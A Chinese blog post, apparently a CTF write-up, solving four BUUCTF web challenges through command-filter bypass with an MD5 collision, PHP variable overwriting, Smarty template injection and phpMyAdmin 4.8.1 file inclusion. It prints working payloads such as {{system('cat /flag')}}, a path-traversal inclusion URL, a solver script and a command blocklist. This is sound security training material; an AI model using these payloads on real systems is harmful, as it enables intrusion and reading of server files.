buu web 41-44 writeup

最新推荐文章于 2023-04-08 14:57:04 发布
最新推荐文章于 2023-04-08 14:57:04 发布
阅读量576 收藏
点赞数 2
分类专栏: CTF刷题记录 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/114163843
版权

buu web 41-44 writeup

[安洵杯 2019]easy_web

解题过程

1.base64解码

2.继续base64解码

3.hex转字符串

4.找index.php源码

5.代码审计

6.burp抓包(尽量别用hackbar,会对url造成影响)

[BJDCTF2020]Mark loves

解题过程

1.第一个exit($handsome)

2.第二个exit($yds)

3.第三个exit($is)

[BJDCTF2020]The mystery of ip

解题过程

[GWCTF 2019]我有一个数据库

解题过程

相关资料

[安洵杯 2019]easy_web

题目:

解题过程

打开后,显示如下,....写得过于真实。。。

注意观察url,url中GET方式传了两个值img 和cmd  ,注意这两个参数(img参数在之后的找出源码发挥重要作用,cmd在之后的命令执行找flag发挥作用

http://f0418f30-7527-44ff-bc26-9f949861fa76.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

1.base64解码

 img的值看着像base64编码,解码

2.继续base64解码

因为解码得到的结果还是感觉像base64,继续解码

3.hex转字符串

做题太少,当时不知道这段字符串干嘛用的,   在hex(十六进制)转字符串,工具网站:https://tool.lu/hexstr/   ,得到

在这里大概猜到img的作用:传入img,首先对img进行两次base64解码,得到hex,再转字符串(即文件名),服务端会将存在的文件返回到客户端,(比如默认返回的是555.png这个图片)

如果我的思路有问题欢迎指正

4.找index.php源码

首先对"index.php"进行转成十六进制,再两次base64编码,作为img的值传入即可

(1)转成16进制

(2)base64编码两次

(3)将base64编码得到的值传入,在url中得到index.php的base64编码

 

进行base64解码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixiï½ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

5.代码审计

index.php代码大致分为两部分,上一部分对img进行防护,但是我们看到img对得到flag并没有帮助

下一部分,对cmd进行防护过滤,包括正则匹配和md5强碰撞的知识点

(1)正则匹配绕过(感谢师傅的耐心指点)

我们看到过滤了很多关键词,主要是|\\|\\\\|  这个点,网上的wp有些是将\\  \\\\分开看的,但是\\不能过滤\  ,\\\  和\\\\可以过滤\,(注意前提:单独使用)这个参考师傅的wp:php中三个\\\和四个\\\\

但是在这个题目中正则匹配  "|\\|\\\\|" ,\\ 和\\\\连接在一起,这会对本应该能过滤的\造成影响

本地复现下

<?php
$cmd='ca\t%20flag';
$cmd1="ca\t%20flag";
$pattern="/\\|\\\\/i";
var_dump($pattern);
if(preg_match($pattern, $cmd))
echo "过滤成功";
else 
echo "绕过成功";
echo "\n";
?>

---------- php5.69 ----------
string(7) "/\|\\/i"
绕过成功

输出完成 (耗时 0 秒) - 正常终止

 注意:  var_dump($pattern);  结果是string(7) "/\|\\/i"     所以传到正则函数中时, "/\|\\/i"中的 \ 又会进行转义,所以实际过滤的字符串是|\

各位可以试一下ehco $cmd和echo $cmd1,对理解这个正则过滤很有帮助。

(2)md5强碰撞

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))

 POST传值a和b,要求对a和b进行转字符串后两者值不相同,同时a和b的md5编码相同(注意a和b有一点细微的差别,不是相同的字符串,a中的是%00,b中的是%02 ,所以转字符串后就不相同)

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

本地实验

<?php
$a="%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2";
$b="%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2";

$a=urldecode($a);
$b=urldecode($b);

var_dump(md5($a));
echo "\n";

var_dump(md5($b));
echo "\n";

---------- php5.69 ----------
string(32) "008ee33a9d58b51cfeb425b0959121c9"

string(32) "008ee33a9d58b51cfeb425b0959121c9"


输出完成 (耗时 0 秒) - 正常终止

6.burp抓包(尽量别用hackbar,会对url造成影响)

(1)将传值方式改为POST

(2)POST传值a和b

(3)可以将第一行img中的值删除(这个无所谓,主要是删了后响应会更好看一点)

(4)cmd=dir  ,查看文件目录,发现和之前推测的一样,改目录有各种文件,555.png,index.php等,可以通过改变url的值得到

(5)cmd=dir%20/  ,查看根目录(经验,flag在/根目录)

(6)cmd=ca\t%20/flag,经过前面的分析没有过滤\,过滤的其实是|\,所以这里用\绕过防护cat就行

(7)看师傅们的wp,可以用sort函数,cmd=sort%20/flag

sort函数:sort将文件的每一行作为一个单位相互比较,比较原则是从首字符向后依次按ASCII码进行比较,最后将它们按升序输出(就是按行排序)

 

[BJDCTF2020]Mark loves

题目:buu

解题过程

.git源码泄露,在python2.x的环境下运行,注意GitHack.py,其他人可能名称和我的不一样,执行后,在该目录下会有网站源码

python2 GitHack.py http://6c7e2a80-81d9-4ac0-a658-d349a99b5b43.node3.buuoj.cn/.git/

点开index.php,进行代码审计

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;        //注意和下面的区别,如果传入两个变量,键名的值为后面value
}

foreach($_GET as $x => $y){
    $$x = $$y;       //如果传入两个变量,则key的值为value代表的值
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

看到源码,这个牵扯到php变量覆盖漏洞:资料传送门

首先分析,可能得到flag得方式有两种:

1.exit()函数

exit() 函数输出一条消息,并退出当前脚本。

该函数是 die()函数的别名。

2.最后一句echo "the flag is: ".$flag;输出$flag。。下面进行具体分析

1.第一个exit($handsome)

先上payload

?a=flag&flag=a&handsome=flag

对相关代码进行分析

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

 第一个foreach的结果是$a等于$flag的值,$flag等于$a的值,也就是$flag=$flag,$handsome等于$flag的值

第二个foreach,当循环到a=flag时,$x=a,$y=flag,这时$_GET['flag']===$x成立,且$x!=='flag'也成立,执行exit($handsome)

2.第二个exit($yds)

payload

?yds=flag

 对相关代码进行分析

foreach($_GET as $x => $y){
    $$x = $$y;
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

 $x=yds,$y=flag,则$($x)=$($y)即为$(yds)=$(flag),这样的话变量$yds的值就是$flag的值,然后再进行exit($yds),也就是输出flag.

3.第三个exit($is)

payload

?is=flag&flag=flag

对相关代码进行分析

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

 类似于第二个exit的分析,

 $x=is,$y=flag,则$$x=$$y即$is=$flag,这主要是为了执行exit($is)的时候输出$flag的值

 $x=flag,$y=flag,则$$x=$$y即$flag=$flag,这主要是为了满足第三个if,同时绕过第二个if,然后执行exit($is),即输出flag

$_GET['flag']==='flag'这一点当时有一点疑惑,所以再本地复现了一下

在一个目录下,有test.php,flag.php,里面是hello world

复现源码,下面是test.php

$flag = file_get_contents('flag.php');
$is = "cat";
foreach($_GET as $x => $y){
    $$x = $$y;
}

echo $_GET['flag'];
echo "<br>";
if($_GET['flag']==='flag')
	exit($is);

 payload:

http://127.0.0.1/test.php?is=flag&flag=flag

回显:

 

下面是相应的python脚本,写得比较粗糙,三个payload都可以

import requests
import re
url="http://6b4c2f12-e4ce-41d6-a59e-94359d675519.node3.buuoj.cn/"
table=""
#payload="?yds=flag"
payload="?is=flag&flag=flag"
#payload="?a=flag&flag=a&handsome=flag"
ra = requests.get(url+payload).text
table=re.findall(r"flag{(.+?)}",ra)   #寻找符合flag{}形式的字符串,返回的table的是一个数组
table='flag{'+table[0]+'}'    #找数组的第一个字符串
print(table)

 

[BJDCTF2020]The mystery of ip

题目:buu

解题过程

点击flag,界面回显是我的ip地址,当时的直接反应是burp抓包,加上X-Forwarded-For:127.0.0.1,试了试,发现回显没有变化。太菜了太菜了。。。

还是看了师傅们的wp,才知道这个题目考察的是模板注入。首先测试

X-Forwarded-For:{{7+7}}

回显:

然后就简单了

可以找一下flag的位置

X-Forwarded-For:{{system('find / -name flag')}}

回显:

flag在根目录下,(其实也应该想到的,刷了那么多题目,基本上都是在根目录下)

下面是一些可以得到flag的命令:

{{system('cat /flag')}}
{{system('cat ../../../flag')}}
{{show_source('/flag')}}
{{readfile('/flag')}}

另外看师傅们的wp,知道了这个是smarty注入

查看smarty的版本,确定了是smarty注入

smarty支持使用{php}{/php}标签执行包裹其中的php指令,但是本题会报错

可以使用if标签

Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif},全部的PHP条件表达式和函数都可以在if内使用,如||*, or, &&, and, is_array(), 等等,如:{if is_array($array)}{/if}*

根据if标签得到找flag的命令:

{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}
{if system('cat /flag')}{/if}
{{readfile('/flag')}}

 

[GWCTF 2019]我有一个数据库

题目:buu

解题过程

打开题目

这。。。什么玩意?

御剑扫目录phpmyadmin,访问直接登录phpmyadmin,不需要输入用户名和密码

注意查看phpmyadmin的版本4.8.1,百度一下,发现存在任意文件包含漏洞,可以通过目录穿越包含任意文件,下面是一个例子

?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini

至于我们这里,因为看到linux,则按照经验flag在根目录下,上payload

phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../../flag

得到flag

 

相关资料

1.hex转换在线工具

2.为什么3个\在php中等于4个\

3.php中三个\和四个\的解释及关系

4.php变量覆盖漏洞原理及复现

5.php模板注入(smarty注入)

6.phpmyadmin4.8.1远程包含漏洞复现

7.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

8.御剑下载,安装,使用教程

 

 

Sk1y
关注
专栏目录
BUUCTF训练打卡
Leo8283的博客
04-26 689
BJDCTF2020]ZJCTF,不过如此 首先 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64- encode/resource=next.php 或者 者 https://www.cnblogs.com/wangtanzhi/p/12328083.html https://xz.aliyun.com/t/2557 payload:/S*=${phpinf
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3863
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
md5相关比较
m0_51428325的博客
11-16 1165
弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199...
BUUCTF easy web中md5的问题
qq_44927883的博客
12-03 1535
看了大家的wp,在绕过下面的md5的时候,都是通过两个特殊的值绕过的,但经测后发现不对。 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); } 启动本地php跑一下 <?php echo (string)$_GET['a']; echo "
BUUCTF 19
qq_52431855的博客
02-01 563
知识点 PHP foreach循环 PHP foreach 循环结构是遍历数组时常用的方法,foreach 仅能够应用于数组和对象,如果尝试应用于其他数据类型的变量或者未初始化的变量将发出错误信息。 foreach 有以下两种语法格式: //格式1 foreach (array_expression as $value){ statement } //格式2 foreach (array_expression as $key => $value){ statem...
ISCC2022--Writeup
m0_61596829的博客
06-03 7129
ISCC2022--writeup
BUUCTF-WriteUp
鱼的博客
02-01 769
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
buu做题笔记——[BJDCTF2020]ZJCTF,不过如此&CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_46330722的博客
11-05 402
BUU[BJDCTF2020]ZJCTF,不过如此CISCN2019 华北赛区 Day2 Web1]Hack World [BJDCTF2020]ZJCTF,不过如此 题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2815
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
BUUCTF Reverse 简单注册器 WriteUp
PlumpBoy的博客
09-11 330
简单注册器-WP 一个apk文件,直接用jdax-gui打开 定位到核心加密部分,将其复制出来,写一个c的解密程序 #include <iostream> using namespace std; int main() { char x[] = "dd2940c04462b4dd7c450528835cca15"; x[2] = (char)((x[2] + x[3]) - 50); x[4] = (char)((x[2] + x[5]) - 48); x[
CTF题解三 逆向 where is your flag(ISCC2017)
LJFYYJ的博客
07-11 3099
直接进入test函数: 下面的代码进行第一步操作: 首先a1的长度应该为19。 接下来对s2进行异或处理。 题目中给出的s2的值如下: s2 = 0x3929531D01070A00LL; v4 = 0x391257391F150703LL; v5 = 0x150F; v6 = 0x1B; s2是int64类型,共有8个字节。由于s2、v4、v5和v6的地址是相连的,所以当...
BUUCTF笔记之Web系列部分WriteUp(四)
热门推荐
克格莫(有需要的私信)
06-24 2万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
BUUCTF Fake XML cookbook
wwwwyyyrre的博客
04-08 269
打开题目发现有账号密码登录 先尝试万能密码 但是发现不行 回到题目有xml 去搜索一下发现xml有注入漏洞XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。XXE原理。
PHP函数漏洞总结
柠檬木有枝
08-26 3079
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
CTF中的Bypass命令执行
D.MIND 的博客
08-03 3280
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
正则\绕过
nigo134的博客
07-27 493
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) { echo("forbid ~");.
原生PHP接收$_POST的几种方式
黑白相间...
01-21 1万+
HTTP 常见 Content-Type &gt; application/x-www-form-urlencoded &gt; multipart/form-data &gt; application/json $_POST 默认只能接收到 Content-Type: application/x-www-form-urlencoded 的数据 如果Content-Type: applic...
preg_replace /e模式下代码漏洞
sGanYu
10-17 1187
<?php error_reporting(0); $text = $_GET["text"];//以get方式提交text $file = $_GET["file"];//以get方式提交file if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){//file_get_content需要读到一个$text传来的内容为I have a dream的文件 echo "<br>...
【2020安洵杯】EasyCM WriteUp
古月浪子的博客
12-17 571
这题从早上9点开始,做了快3小时,最后被人领先8分钟拿了一血,只拿到一个二血,呜呜呜/(ㄒoㄒ)/~~ 这题IDA有点白给,直接上x32dbg动调 可以看到要比较的字符串 我输入的是111d0g,经过某种加密以后变成了OOOBhKaT 前面有判断输入是不是3的倍数,不是则用-补齐的操作 推测是3位一组,一组输出4个字符,有点像base64 加密操作在这个函数里,会调用length/3次,每次输出4个字符 这个函数是动态解密的,而且dump下来后idapython写IDA里patch后也没法F5,懒得修花
buu Quoted-printable
最新发布
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值